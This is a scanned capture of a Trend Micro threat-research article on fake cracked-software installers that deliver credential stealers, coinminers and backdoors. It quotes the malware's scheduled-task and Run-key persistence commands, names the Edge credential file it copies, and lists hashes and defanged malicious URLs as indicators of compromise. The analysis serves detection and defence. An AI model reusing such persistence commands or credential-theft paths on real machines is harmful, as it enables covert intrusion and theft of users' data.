www.trendmicro.com
Open in
urlscan Pro
104.111.231.15
Public Scan
URL:
https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html
Submission: On October 04 via api from US — Scanned from DE
Submission: On October 04 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
</tr>
</tbody>
</table>
</div>
</form><form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form-mobile">
<table cellspacing="0" cellpadding="0" class="gsc-search-box" style="width:100%">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" size="10" class="gsc-input" name="search" title="search" placeholder="Search Trend Micro" autocomplete="off">
</td>
<td class="gsc-search-close collapsed" style="width:1%;" data-target="#search-mobile-wrapper" data-toggle="collapse">
<span class="icon-close"></span>
</td>
</tr>
</tbody>
</table>
</div>
</form>POST #
<form class="acsb-form" data-acsb-search="form" enctype="multipart/form-data" action="#" method="POST"> <input type="text" tabindex="0" name="acsb_search" autocomplete="off" placeholder="Search the online dictionary..."
aria-label="Search the online dictionary..."> <i class="acsbi-search"></i> </form>Text Content
Skip to Content
↵ENTER
Skip to Menu
↵ENTER
Skip to Footer
↵ENTER
dismiss
3 Alerts
* Our cloud workload protection meets all of Gartner's 8 recommendations
dismiss
See how
* Secure Cloud Migration 101
dismiss
Read article
* Micro Frontend Guide: Overview
dismiss
Get the facts
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Home Office Online Store
* Renew Online
* Free Tools
* Find a Partner
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Asia Pacific
* Australia
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
* Europe, Middle East & Africa
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Middle East and North Africa
* Nederland
* Norge (Norway)
* Polska (Poland)
* Россия (Russia)
* South Africa
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
Log In
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
Business
For Home
Products Products
Hybrid Cloud Security
Workload Security
Conformity
Container Security
File Storage Security
Application Security
Network Security
Open Source Security
Network Security
Intrusion Prevention
Advanced Threat Protection
Industrial Network Security
Mobile Network Security
User Protection
Endpoint Security
Industrial Endpoint
Email Security
Web Security
Endpoint & Gateway Suites
Detection & Response
XDR
Endpoint Detection & Response
Zero Trust Risk Insights
Powered by
AI/Machine Learning
Global Threat Intelligence
Connected Threat Defense
All Products & Trials
All Solutions
Service Packages
Small & Midsize Business Security
Solutions Solutions
For Cloud
Cloud Migration
Cloud-Native App Development
Cloud Operational Excellence
Data Center Security
SaaS Applications
Internet of Things (IoT)
Smart Factory
Connected Car
Connected Consumer
5G Security for Enterprises
Risk Management
Ransomware
End-of-Support Systems
Compliance
Detection and Response
Industries
Healthcare
Manufacturing
Federal
Why Trend Micro Why Trend Micro
The Trend Micro Difference
Customer Successes
Strategic Alliances
Industry Leadership
Research Research
Research
About Our Research
Research and Analysis
Research, News and Perspectives
Security Reports
Security News
Zero Day Initiative (ZDI)
Blog
Research by Topic
Vulnerabilities
Annual Predictions
The Deep Web
Internet of Things (IoT)
Resources
DevOps Resource Center
CISO Resource Center
What is?
Threat Encyclopedia
Cloud Health Assessment
Cyber Risk Assessment
Enterprise Guides
Glossary of Terms
Services & Support Services & Support
Services
Service Packages
Managed XDR
Support Services
Business Support
Log In to Support
Technical Support
Virus & Threat Help
Renewals & Registration
Education & Certification
Contact Support
Downloads
Free Cleanup Tools
Find a Support Partner
For Popular Products
Deep Security
Apex One
Worry-Free
Worry-Free Renewals
Partners Partners
Channel Partners
Channel Partner Overview
Managed Service Provider
Cloud Service Provider
Professional Services
Resellers
Marketplace
System Integrators
Alliance Partners
Alliance Overview
Technology Alliance Partners
Our Alliance Partners
Tools and Resources
Find a Partner
Education and Certification
Partner Successes
Distributors
Partner Login
Company Company
Overview
Leadership
Customer Success Stories
Strategic Alliances
Industry Accolades
Newsroom
Webinars
Events
Security Experts
Careers
History
Corporate Social Responsibility
Diversity, Equity & Inclusion
Trust Center
Internet Safety and Cybersecurity Education
Investors
Legal
×
Folio (0)
3 Alerts
* Our cloud workload protection meets all of Gartner's 8 recommendations
dismiss
See how
* Secure Cloud Migration 101
dismiss
Read article
* Micro Frontend Guide: Overview
dismiss
Get the facts
* No new notifications at this time.
Download
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
Buy
* Home Office Online Store
* Renew Online
* Free Tools
* Find a Partner
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
Region
* The Americas
* United States
* Brasil
* Canada
* México
* Asia Pacific
* Australia
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
* Europe, Middle East & Africa
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Middle East and North Africa
* Nederland
* Norge (Norway)
* Polska (Poland)
* Россия (Russia)
* South Africa
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
Log In
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
Folio (0)
Contact Us
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
* Our cloud workload protection meets all of Gartner's 8 recommendations
dismiss
See how
* Secure Cloud Migration 101
dismiss
Read article
* Micro Frontend Guide: Overview
dismiss
Get the facts
* No new notifications at this time.
* Scan Engines
* All Pattern Files
* All Downloads
* Subscribe to Download Center RSS
* Home Office Online Store
* Renew Online
* Free Tools
* Find a Partner
* Contact Sales
* Locations Worldwide
* 1-888-762-8736 (M-F 8am - 5pm CST)
* Small Business
* Buy Online
* Renew Online
* The Americas
* United States
* Brasil
* Canada
* México
* Asia Pacific
* Australia
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
* Europe, Middle East & Africa
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Middle East and North Africa
* Nederland
* Norge (Norway)
* Polska (Poland)
* Россия (Russia)
* South Africa
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
* My Support
* Log In to Support
* Partner Portal
* Home Solutions
* My Account
* Lost Device Portal
* Trend Micro Vault
* Password Manager
* Customer Licensing Portal
* Online Case Tracking
* Premium Support
* Worry-Free Business Security Services
* Remote Manager
* Cloud One
* Referral Affiliate
* Referral Affiliate
* Contact Sales
* Locations
* Support
* Find a Partner
* Learn of upcoming events
* Social Media Networks
* Facebook
* Twitter
* Linkedin
* Youtube
* Instagram
* 1-888-762-8736 (M-F 8-5 CST)
undefined
Malware
Subscribe
Content added to Folio
Folio (0) close
Malware
FAKE INSTALLERS DROP MALWARE AND OPEN DOORS FOR OPPORTUNISTIC ATTACKERS
We recently spotted fake installers of popular software being used to deliver
bundles of malware onto victims’ devices. These installers are widely used lures
that trick users into opening malicious documents or installing unwanted
applications.
By: Ryan Maglaque, Joelson Soares, Gilbert Sison, Arianne Dela Cruz, Warren
Sto.Tomas September 27, 2021 Read time: 5 min (1395 words)
Save to Folio
Subscribe
--------------------------------------------------------------------------------
It is widely known that with regard to cybersecurity, a user is often identified
as the weakest link. This means that they become typical entry vectors for
attacks and common social-engineering targets for hackers. Enterprises can also
suffer from these individual weak links. Employees are sometimes unaware of
online threats, or are unfamiliar with cybersecurity best practices, and
attackers know exactly how to take advantage of this gap in security.
One way that attackers trick users is by luring them with unauthorized apps or
installers carrying malicious payloads. We recently spotted some of these fake
installers being used to deliver bundles of malware onto victims’ devices. These
fake installers are not a new technique used by attackers; in fact, they are old
and widely used lures that trick users into opening malicious documents or
installing unwanted applications. Some users fall into this trap when they
search the internet for free or cracked versions of paid applications.
Looking inside the fake installers
We saw users trying to download cracked versions of non-malicious applications
that had limited free versions and paid full versions, specifically, TeamViewer
(a remote connectivity and engagement solutions app), VueScan Pro (an app for
scanner drivers), Movavi Video Editor (an all-in-one video maker), and Autopano
Pro for macOS (an app for automated picture stitching).
One example that we dive into here involves a user who tried to download an
unauthorized version of TeamViewer (an app that has actually been used as
camouflage for trojan spyware before). The user downloaded a malicious file
disguised as a crack installer for the application.
Figure 1. Malicious files downloaded by user
After downloading and executing these files, one of the child processes created
other files and the executable setup.exe/setup-installv1.3.exe, which was
extracted from 320yea_Teamviewer_15206.zip via WinRAR.exe. This file seems to be
the source of most of the downloaded malicious files, as seen in the following
figure.
Figure 2. Unpacking of setup-installv1.3.exe via WinRar.exe
Afterward, the file aae15d524bc2.exe was dropped and executed via Command
Prompt. It then spawned a file,
C:\Users\{username}\Documents\etiKyTN_F_nmvAb2DF0BYeIk.exe, which sequentially
initiated the BITS admin download. BITS admin is a command-line tool that can
help monitor progress and create, download, and upload jobs. The tool also
allows a user to obtain arbitrary files from the internet, a feature that
attackers can abuse.
Figure 3. BITS admin execution detection
We also observed that information in the browser's credential store was taken by
the attacker. Specifically, the stored data in
C:\Users\{username}\AppData\Local\Microsoft\Edge\User Data\Default\Login was
copied. Credentials stored in browsers are often critical personal data that
could be leveraged by attackers to gain access into personal, business, or
financial accounts. Attackers can even compile and sell this information in
underground markets.
To maintain persistence, an executable file was entered in the AutoStart
registry and a scheduled task was created:
* Create scheduled task: C:\Windows\System32\schtasks.exe /create /f/sc onlogon
/rl highest /tn"services64"/tr
'"C:\Users\{username}\AppData\Roaming\services64.exe"'
* AutoStart
registry: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\prun:C:\WINDOWS\PublicGaming\prun.exe
As previously mentioned, these cases come about because users search for free
applications and trust that someone is going to put the cracked or stolen full
version online as a gesture of good will. But as we can see, attackers simply
take advantage of those who download these files.
In Figure 4, we can see that a trojanized VueScan file is already in a Downloads
folder and is executed by legitimate user.
Figure 4. Unpacking of 61193b_VueScan-Pro-974.zip which created a new process
Following the execution of setup_x86_x64_install.exe, it created and executed a
new file named setup_installer.exe that dropped several files and queried
several domains. Most of these domains are malicious, as evidenced in Figure 5.
Figure 5. Dropped malicious files querying several domains
This malicious payload also exhibits backdoor behavior. We can see that the
attackers are listening on these channels: 127.0.0.1:53711 and 127.0.0.1:53713.
This lets the attacker keep a foothold in the computer; through this, they can
possibly move laterally across the network and, if it is an enterprise device,
compromise a critical company asset.
The other fake installers also had similar behavior that exploits users that
attempt to download either an unauthorized application cracker/activator or an
illegal full version. These infections then create persistence for later
access.
How widespread is the threat?
Camouflaged malicious installers and apps are often used to load malware onto
victim’s devices. A few recent examples are widespread fake
cryptocurrency-mining applications that took advantage of neophyte cryptominers
and fake Covid-19 update apps. In tracking this current batch of fake
installers, we were able to detect incidents around the world. We initially do
not classify these particular events as targeted attacks, mostly because in all
cases the users actively searched for application crackers or unlocked versions
of software. But even if these were not initially targeted attacks, they can
later lead to opportunistic hacks because the attacker already has a presence in
the computer. Aside from loading malware, the attackers can use their initial
access to conduct malicious activity, like compromising a company’s virtual
private network (VPN). They could even sell the access to other cybercrime
gangs, such as ransomware operators. It’s important to stress that attackers use
every tool within reach, and even legitimate applications can be weaponized.
Figure 6. Unique detections per region of the indicators of compromise (IOCs)
listed in the following. The data is sourced from Trend Micro™ Smart Protection
Network™ for the month of August.
Of course, we also know that software piracy is prevalent in many regions. From
the data in Figure 6, we can surmise that it is still a major threat to
security. Users have to be more aware of the threats these illegal installers
can hold and implement stricter security practices for installing and executing
applications from the internet onto their personal and work devices.
The global pandemic has pushed users out of offices and into work-from-home
(WFH) situations where there are other “physically” connected devices like the
internet of things (IoT), personal mobiles, and personal computers that have
weak security. These present a problem because malware can quickly spread from
personal devices to business computers on the same network.
Malicious capabilities of the fake installers
We were able to analyze some of the malicious files bundled into the installers.
Their capabilities are varied, from cryptocurrency mining to stealing
credentials from social media applications. We enumerate them in this table:
Malicious file Actions
Trojan.Win32.MULTDROPEX.A
* Main dropper of the malicious file
* Disguised as cracker/installer of legitimate applications
Trojan.Win32.SOCELARS.D
* Gathers information regarding the machine
* Collects browser information
* Collects social media information (Instagram and Facebook)
* Collects information from Steam application
* Drops Google Chrome extension responsible for further stealing of
Facebook/credit card/payment credentials
Trojan.Win32.DEALOADER.A
* Malware downloader
* URL inactive, but based on research possibly another stealer
TrojanSpy.Win32.BROWALL.A
* Collects browser information
* Collects cryptocurrency wallet information
TrojanSpy.Win32.VIDAR.D
* Collects browser information
* Collects credentials
Trojan.Win64.REDLINESTEALER.N
* Executes command from remote user
* Gathers information regarding the machine
* Collects browser information
* Collects FTP client information
* Collects VPN information
* Collects cryptocurrency wallet information
* Collects information from other applications (Discord, Steam, Telegram)
Coinminer.MSIL.MALXMR.TIAOODBL
* Downloads miner module hosted on Discord
* XMR miner
* Installs persistence via scheduled tasks and AutoRun registry
How to protect yourself from the threat of malware
As aforementioned, fake installers are not new, but they are still a widely used
delivery system for malware. Attackers are uploading more and more of these
files for a simple reason: They work. Users download and execute these
installers, and this lets attackers maintain persistence in personal devices and
gives them a way into company networks as well.
To combat this threat, it is important for users to be educated on the effects
of downloading files from untrusted websites. There are also other security
measures to take:
* A multilayered security approach is necessary when protecting the
environment. If one layer of protection fails, there are still others in
place that can prevent the threat.
* Application control will help prevent execution of suspicious files.
* Restricting admin rights for users that do not need access is also a good
preventive measure.
Indicators of Compromise
File name SHA256 Detection name setup-installv1.3.exe
787939d2fc30c7b6ff6ddb7f4e7f981c2a2bad0788b2f4d858c3bb10186d42f6
Trojan.Win32.MULTDROPEX.A setup_installer.exe
bdf727b2ac0b42a955c4744bf7768cbb9fa67167321e4fb5639ee5529ccbcfa4
Trojan.Win32.MULTDROPEX.A setup_install.exe
97f18d430b68ac9379ecd267492e58734b3c57ffd66615e27ff621ea2bce8e6b
Trojan.Win32.MULTDROPEX.A 5f9a813bc385231.exe
9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
Trojan.Win32.SOCELARS.CDK sqlite.dll
5c41a6b98890b743dd67caa3a186bf248b31eba525bec19896eb7e23666ed872
TrojanSpy.Win32.SOCELARS.CDK b5203513d7.exe
a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
Coinminer.MSIL.MALXMR.TIAOODBH 5f9a813bc38523010.exe
8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
Trojan.Win32.DEALOADER.A aae15d524bc2.exe
1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
TrojanSpy.Win32.BROWALL.A bf2e8642ac5.exe
e3c9119e809a1240caaaf4b6d5420352f037cc2585cb321cb746f05ed0ec0e43
TrojanSpy.Win32.SOCELARS.D 745d0d3ff9cc2c3.exe
b151ffd0f57b21600a05bb28c5d1f047f423bba9750985ab6c3ffba7a33fa0ff
TrojanSpy.Win32.VIDAR.D 438dc1669.exe
e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
Trojan.Win64.REDLINESTEALER.N 1cr.exe
949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
TrojanSpy.MSIL.REDLINESTEALER.N a6168f1f756.exe
c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
Coinminer.MSIL.MALXMR.TIAOODBL f65dc44f3b4.exe
dc5bbf1ea15c5235185184007d3e6183c7aaeb51e6684fbd106489af3255a378 Mal_HPGen-50
a070c3838.exe 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
TROJ_GEN.R053C0PHC21
Malicious URLs:
* hxxp://fsstoragecloudservice[.]com/data/data[.]7z
* hxxp://3[.]128[.]66[.]194/
* 45[.]14[.]49[.]68
* plugnetx[.]com
* znegs[.]xyz
* iryarahara[.]xyz
* swiftlaunchx[.]com
* bluewavecdn[.]com
* sproutfrost[.]com
* hxxp://37[.]0[.]11[.]8/
* hxxp://52[.]51[.]116[.]220/
* 195[.]181[.]169[.]68
* 88[.]99[.]66[.]31
Tags
Malware | Endpoints | Research | Articles, News, Reports | Cyber Threats
AUTHORS
* Ryan Maglaque
Threats Analyst
* Joelson Soares
Threats Analyst
* Gilbert Sison
Threats Analyst
* Arianne Dela Cruz
Threats Analyst
* Warren Sto.Tomas
Sr. Threat Research Engineer
Contact Us
Subscribe
RELATED ARTICLES
* Mac Users Targeted by Trojanized iTerm2 App
* FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its
Arsenal
* The Evolution of Connected Cars as Defined by Threat Modeling UN R155-Listed
Attack Vectors
Archives
* Contact Sales
* Locations
* Careers
* Newsroom
* Trust Center
* Privacy
* Accessibility
* Support
* Site map
* linkedin
* twitter
* facebook
* youtube
* instagram
* rss
Copyright © 2021 Trend Micro Incorporated. All rights reserved.
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
WELCOME TO TREND MICRO
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.
{{opt_in}}
Accept
Learn more
AddThis Sharing Sidebar
Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintMore AddThis
Share optionsAddThis
5
SHARES
Hide
Show
Close
AddThis
English
Accessibility Adjustments
Reset Settings Statement Hide Interface
Choose the right accessibility profile for you
OFF ON
Seizure Safe Profile Eliminates flashes and reduces color
This profile enables epileptic and seizure prone users to browse safely by
eliminating the risk of seizures that result from flashing or blinking
animations and risky color combinations.
OFF ON
Vision Impaired Profile Enhances the website's visuals
This profile adjusts the website, so that it is accessible to the majority of
visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract,
Glaucoma, and others.
OFF ON
Cognitive Disability Profile Assists with reading and focusing
This profile provides various assistive features to help users with cognitive
disabilities such as Autism, Dyslexia, CVA, and others, to focus on the
essential elements of the website more easily.
OFF ON
ADHD Friendly Profile More focus and fewer distractions
This profile significantly reduces distractions, to help people with ADHD and
Neurodevelopmental disorders browse, read, and focus on the essential elements
of the website more easily.
OFF ON
Blind Users (Screen-reader) Use the website with your screen-reader
This profile adjusts the website to be compatible with screen-readers such as
JAWS, NVDA, VoiceOver, and TalkBack. A screen-reader is software that is
installed on the blind user’s computer and smartphone, and websites should
ensure compatibility with it.
Note: This profile prompts automatically to screen-readers.
OFF ON
Keyboard Navigation (Motor) Use the website with the keyboard
This profile enables motor-impaired persons to operate the website using the
keyboard Tab, Shift+Tab, and the Enter keys. Users can also use shortcuts such
as “M” (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics)
to jump to specific elements.
Note: This profile prompts automatically for keyboard users.
Content Adjustments
Content Scaling
Default
Readable Font
Highlight Titles
Highlight Links
Text Magnifier
Adjust Font Sizing
Default
Align Center
Adjust Line Height
Default
Align Left
Adjust Letter Spacing
Default
Align Right
Color Adjustments
Dark Contrast
Light Contrast
Monochrome
High Saturation
Adjust Text Colors
Cancel
High Contrast
Adjust Title Colors
Cancel
Low Saturation
Adjust Background Colors
Cancel
Orientation Adjustments
Mute Sounds
Hide Images
Read Mode
Reading Guide
Useful Links
Select an option Home Header Footer Main Content
Stop Animations
Reading Mask
Highlight Hover
Highlight Focus
Big Black Cursor
Big White Cursor
HIDDEN_ADJUSTMENTS
Keyboard Navigation
Accessible Mode
Screen Reader Adjustments
Read Mode
Web Accessibility Solution By accessiBe
Choose the Interface Language
English
Español
Deutsch
Português
Français
Italiano
עברית
繁體中文
Pусский
عربى
عربى
Nederlands
繁體中文
日本語
Hide Accessibility Interface? Please note: If you choose to hide the
accessibility interface, you won't be able to see it anymore, unless you clear
your browsing history and data. Are you sure that you wish to hide the
interface?
Accept Cancel
Continue
Processing the data, please give it a few seconds...